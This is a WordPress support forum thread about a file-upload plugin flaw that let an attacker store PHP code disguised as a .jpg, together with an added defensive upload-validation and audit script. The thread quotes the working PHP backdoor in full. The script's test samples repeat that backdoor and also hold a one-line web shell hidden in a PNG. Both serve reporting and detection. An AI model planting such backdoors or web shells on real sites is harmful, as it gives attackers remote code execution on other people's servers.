• planetree

    (@planetree)


    Someone was able to use the WordPress File Upload plugin to upload a file to our site with the filename “wfu_widget_logo.jpg”. The file was not a .jpg as named, it contained the following PHP code:

“<?php extract($_REQUEST);if(md5($b)!='9546d40688a5eaae1de839b1d3566e1a'){die();}$c($f, $a);include_once $f; ?>”

For unfathomable reasons, WordPress File Upload deposits any guest uploads into its own root folder (/wp-content/plugins/wp-file-upload/lib), and, regardless of the file name, if there is PHP code in there then at the very least it will cause an error that takes your site down if there is a code error, which is what happened to us. Worst case, that code will be executed, as the attacker clearly intended in this case.

If this is even a remote possibility under some basic WordPress configuration I would think it would warrant a giant warning when you install the plugin at the very least. Ideally there would be something to prevent this.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Plugin Author nickboss

    (@nickboss)

    Hi, was the file uploaded finally?

    Please note that the plugin takes security very seriously. It implements several ways to protect from hackers. For cases like yours, here are some measures that it takes:

    1. Allows only certain extensions, which can be further limited. In your case, .jpg is a common one, so it passed this step.
    2. It checks for double extensions (like php.jpg). Not your case.
    3. It checks the contents of the file to verify the extension. For this, it uses the default WordPress functions. So, I am surprised that the image managed to pass this step.

Are you sure that the file was uploaded using the plugin? Has the upload been recorded in View Log in the plugin’s Dashboard area?

    Regards

    Nickolas

    Thread Starter planetree

    (@planetree)

    The file was definitely uploaded through the plugin, it’s in the log.

    Whatever function you’re using to verify the extension is obviously unsuitable. If you’re operating in a PHP environment then you’d think that checking a file for the string “<?php” if it’s anything other than a .php extension file would be the bare minimum! As an FYI, I did try uploading the file on the section of our site where we write the code, where we use the Codeigniter framework, and it correctly rejected the file, so if you’re looking for code that does the job right you need look no further than that.

    Let’s be clear, there is at least one malicious actor out there that is actively searching for instances of your plug-in and uploading malicious code. In the face of that it is absolutely irrelevant if WordPress is to blame and the fact that you “use the default WordPress functions” absolves you of no blame now that you know it’s an issue. Like I said, at a minimum you should write some code to reject any file with “<?php” in it, that would take you 2 minutes to do and it’s almost malpractice not to have already done so.

    If you provide the URL of your WordPress site with your plugin installed I’m happy to demo crashing it by uploading the file I described. Just let me know a good time so you can delete the file and bring it back up again quickly.

    Plugin Author nickboss

    (@nickboss)

    Hi again.

    I very well understand what you say. My previous email was not to doubt your statement. Take it easy! I am just trying to understand why it happened.

As I said, it seems that the file passed bullet No. 3, which was exactly doing what you mention, checking the file contents. The same happens in my environment. So I need to understand why.

    I will get back to you ASAP.

    Thanks for the notice.

    Nickolas

    Plugin Author nickboss

    (@nickboss)

    I will release a new version of the plugin today with a fix that checks file contents for PHP tags without relying on WordPress functions. I checked it and it works for cases like the one you mentioned.

I also checked how Codeigniter handles file uploads. It makes extensive checks on file contents to avoid XSS attacks. I will consider adding it as an additional security layer in the next release (not the one coming today but the following one).

    Btw, are you a security expert?

    Regards

    Nickolas
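The following is an added example, written for this thread and not code from the WordPress File Upload plugin or from either participant. It puts the three measures the author lists (extension allowlist, double-extension rejection, content check against the claimed type) next to the fourth one the reporter asked for and the fix post describes (reject any file containing a PHP open tag, whatever its name), and adds an audit function for files already on disk, since in this case the file had already been stored. The allowed extensions, the magic bytes, the tag regex and the sample files are assumptions constructed here; the first sample reproduces the payload quoted at the top of the thread.

```php
<?php
// Added example for this thread, not code from the WordPress File Upload plugin.
declare(strict_types=1);

// Assumption: only these image extensions are accepted.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Leading bytes expected for each allowed type (assumed allowlist).
const MAGIC = [
    'jpg'  => "\xFF\xD8\xFF",
    'jpeg' => "\xFF\xD8\xFF",
    'png'  => "\x89PNG\r\n\x1A\n",
    'gif'  => "GIF8",
];

// True if the data contains a PHP open tag anywhere: <?php, <?= or a short tag "<? ".
// Runs over the whole file, so a payload placed after a valid image header is caught too.
function has_php_tag(string $data): bool
{
    return preg_match('/<\?(php\b|=|\s)/i', $data) === 1;
}

// Returns the reasons to reject the upload; an empty list means every check passed.
function check_upload(string $filename, string $data): array
{
    $errors = [];
    $parts  = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2 || end($parts) === '') {
        return ['missing extension'];
    }
    $ext = array_pop($parts);

    // 1. extension allowlist
    if (!in_array($ext, ALLOWED_EXT, true)) {
        $errors[] = "extension '$ext' not allowed";
    }
    // 2. double extensions such as shell.php.jpg (server-executable inner extension)
    foreach ($parts as $inner) {
        if (preg_match('/^ph(p\d?|tml|ar)$/', $inner) === 1) {
            $errors[] = "double extension '.$inner'";
        }
    }
    // 3. content must begin with the magic bytes of the claimed type
    if (isset(MAGIC[$ext]) && strncmp($data, MAGIC[$ext], strlen(MAGIC[$ext])) !== 0) {
        $errors[] = "content does not start like a .$ext image";
    }
    // 4. no PHP open tag anywhere in the content, whatever the file name says
    if (has_php_tag($data)) {
        $errors[] = 'PHP open tag found in content';
    }
    return $errors;
}

// Audit: list files already on disk that carry an allowed image extension but contain PHP code.
function scan_dir(string $dir): array
{
    $hits = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile() || !in_array(strtolower($file->getExtension()), ALLOWED_EXT, true)) {
            continue;
        }
        $data = file_get_contents($file->getPathname());
        if ($data !== false && has_php_tag($data)) {
            $hits[] = $file->getPathname();
        }
    }
    return $hits;
}

// Constructed samples; the first reproduces the file described at the top of this thread.
function demo(): array
{
    $samples = [
        'wfu_widget_logo.jpg' => '<?php extract($_REQUEST);if(md5($b)!=\'9546d40688a5eaae1de839b1d3566e1a\'){die();}$c($f, $a);include_once $f; ?>',
        'photo.jpg'           => "\xFF\xD8\xFF\xE0" . str_repeat("\0", 32),
        'shell.php.jpg'       => "\xFF\xD8\xFF\xE0" . str_repeat("\0", 32),
        'logo.png'            => "\x89PNG\r\n\x1A\n" . "IHDR<?php system(\$_GET['c']); ?>",
    ];
    $result = [];
    foreach ($samples as $name => $data) {
        $result[$name] = check_upload($name, $data);
    }
    return $result;
}

if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    foreach (demo() as $name => $errors) {
        printf("%-22s %s\n", $name, $errors ? 'REJECT: ' . implode('; ', $errors) : 'accept');
    }
    if (isset($argv[1])) {   // optional audit: php check_upload.php /path/to/upload/dir
        foreach (scan_dir($argv[1]) as $hit) {
            echo "PHP code in image-named file: $hit\n";
        }
    }
}
```

Run with `php check_upload.php` to see the four samples judged (the reported file fails both the magic-byte check and the tag scan; `shell.php.jpg` fails on the inner extension; `logo.png` has a valid header but still fails on the embedded tag), and with a directory argument to audit files that were stored before the check existed. The magic-byte check on its own is not enough, which is why step 4 runs on every file regardless: a real JPEG or PNG can carry `<?php` in a comment or metadata chunk and still be a valid image. The short-tag branch (`<?` followed by whitespace) can reject XML-like text that happens to contain that sequence; drop it only if `short_open_tag` is off on the server. None of this changes the point made at the top of the thread: a content check reduces what gets stored, but uploads that land in a directory the application includes or the web server executes remain a risk, so the storage location should be fixed as well.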

    Thread Starter planetree

    (@planetree)

    Thanks Nick. No security background, just write our own code for our applications.

    Plugin Author nickboss

    (@nickboss)

    Ok if you notice any other problems just let me know.

    Regards

    Nickolas

  • The topic ‘Potentially serious security issue’ is closed to new replies.